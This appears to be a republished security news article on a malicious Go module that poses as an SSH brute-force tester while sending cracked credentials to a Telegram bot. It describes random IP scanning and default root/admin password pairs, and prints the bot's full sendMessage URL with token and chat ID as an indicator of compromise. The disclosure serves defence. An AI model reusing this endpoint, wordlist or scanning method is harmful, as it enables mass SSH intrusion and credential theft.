By rssfeeds-admin 
golang-random-ip-ssh-bruteforce.Masquerading as a legitimate SSH brute-force testing tool, the package secretly exfiltrates successful login credentials to a Russian-speaking threat actor via Telegram, effectively turning users into unwitting credential harvesters for cybercriminal operations.
Technical Architecture of the Credential Harvester
The malicious package operates through a carefully engineered infinite loop that generates random IPv4 addresses and probes TCP port 22 for accessible SSH services.
ssh_bot, username @sshZXC_bot. Right: Telegram User Info confirms active destination account: user Gett, username @io_ping, which maps to chat_id 1159678884.Upon discovering an open port, the tool launches concurrent SSH authentication attempts using a hardcoded wordlist containing common default credentials.
The package deliberately disables host key verification by setting HostKeyCallback: ssh.InsecureIgnoreHostKey(), allowing connections to any SSH server regardless of identity validation.
The embedded wordlist strategically targets IoT devices and hastily configured systems, pairing usernames root and admin with weak passwords, including raspberry, dietpi, alpine, and common sequences like 123456.
This approach indicates systematic targeting of exposed SSH services on small servers, single-board computers, and network appliances where default credentials often persist.
Upon the first successful authentication, the package immediately exfiltrates the compromised credentials to a hardcoded Telegram bot endpoint: https://api.telegram.org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage.
The stolen data, formatted as IP:username:password, is transmitted to a chat ID 1159678884 controlled by the threat actor.
Russian-Speaking Threat Actor and Operational Impact
The package was published on June 24, 2022, by a GitHub user IllDieAnyway (alias G3TT), whom Socket assesses with high confidence as a Russian-speaking threat actor.
This assessment is based on extensive Russian-language content across the actor’s repositories and VKontakte-specific tooling. The threat actor maintains additional offensive tools, including a C2 framework called Selica-C2, suggesting capabilities for building SSH-compromised botnets.
The operational strategy is particularly insidious: by distributing the workload across unwitting operators, the threat actor avoids direct legal exposure while collecting high-value SSH credentials.
Each successful breach provides immediate access credentials that can be leveraged for lateral movement, payload deployment, or sold on criminal marketplaces.
Socket recommends treating all offensive utilities from untrusted sources as potentially hostile, implementing strict egress controls for messaging APIs, and deploying detection rules for Telegram Bot API references and the specific ssh.InsecureIgnoreHostKey() pattern.
The malicious package remains active on both GitHub and Go Module platforms at the time of writing, despite Socket’s removal requests.
Indicators of Compromise (IOCs)
Malicious Go Package
Threat Actor’s Alias and GitHub
IllDieAnywayhttps://github[.]com/IllDieAnyway
Exfiltration Endpoint
https://api[.]telegram[.]org/bot5479006055:AAHaTwYmEhu4YlQQxriW00a6CIZhCfPQQcY/sendMessage?chat_id=1159678884&parse_mode=HTML&text=<code>
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
The post Telegram-Linked Go Module Turns into High-Speed SSH Brute-Force Tool, Steals Credentials appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.